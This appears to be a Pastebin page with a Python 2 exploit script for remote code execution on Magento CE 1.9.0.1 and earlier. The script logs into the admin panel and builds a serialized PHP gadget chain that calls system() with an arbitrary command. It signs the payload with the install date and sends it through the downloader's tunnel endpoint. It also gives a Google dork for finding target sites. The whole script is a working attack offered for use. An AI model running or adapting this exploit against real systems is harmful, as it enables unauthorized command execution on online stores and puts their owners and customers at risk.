API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2019
486
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.72 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
  3. # Google Dork: "Powered by Magento"
  4. # Date: 08/18/2015
  5. # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
  6. # Vendor Homepage: http://magento.com/
  7. # Software Link: https://www.magentocommerce.com/download
  8. # Version: 1.9.0.1 and below
  9. # Tested on: Ubuntu 15
  10. # CVE : none
  11.  
  12. from hashlib import md5
  13. import sys
  14. import re
  15. import base64
  16. import mechanize
  17.  
  18.  
  19. def usage():
  20. print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
  21. sys.exit()
  22.  
  23.  
  24. if len(sys.argv) != 3:
  25. usage()
  26.  
  27. # Command-line args
  28. target = sys.argv[1]
  29. arg = sys.argv[2]
  30.  
  31. # Config.
  32. username = 'ignoreme'
  33. password = 'SuperSecure'
  34. php_function = 'system' # Note: we can only pass 1 argument to the function
  35. install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
  36.  
  37. # POP chain to pivot into call_user_exec
  38. payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
  39. '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
  40. 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
  41. 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
  42. '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
  43. ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
  44. len(arg), arg)
  45. # Setup the mechanize browser and options
  46. br = mechanize.Browser()
  47. #br.set_proxies({"http": "localhost:8080"})
  48. br.set_handle_robots(False)
  49.  
  50. request = br.open(target)
  51.  
  52. br.select_form(nr=0)
  53. br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
  54. br.form.fixup()
  55. br['login[username]'] = username
  56. br['login[password]'] = password
  57.  
  58. br.method = "POST"
  59. request = br.submit()
  60. content = request.read()
  61.  
  62. url = re.search("ajaxBlockUrl = \'(.*)\'", content)
  63. url = url.group(1)
  64. key = re.search("var FORM_KEY = '(.*)'", content)
  65. key = key.group(1)
  66.  
  67. request = br.open(url + '/downloader/index.php/', data='isAjax=false&form_key=' + key)
  68. tunnel = re.search("src=\"(.*)\?ga=", request.read())
  69. tunnel = tunnel.group(1)
  70.  
  71. payload = base64.b64encode(payload)
  72. gh = md5(payload + install_date).hexdigest()
  73.  
  74. exploit = tunnel + '?ga=' + payload + '&h=' + gh
  75.  
  76. try:
  77. request = br.open(exploit)
  78. except (mechanize.HTTPError, mechanize.URLError) as e:
  79. print e.read()
  80. print exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!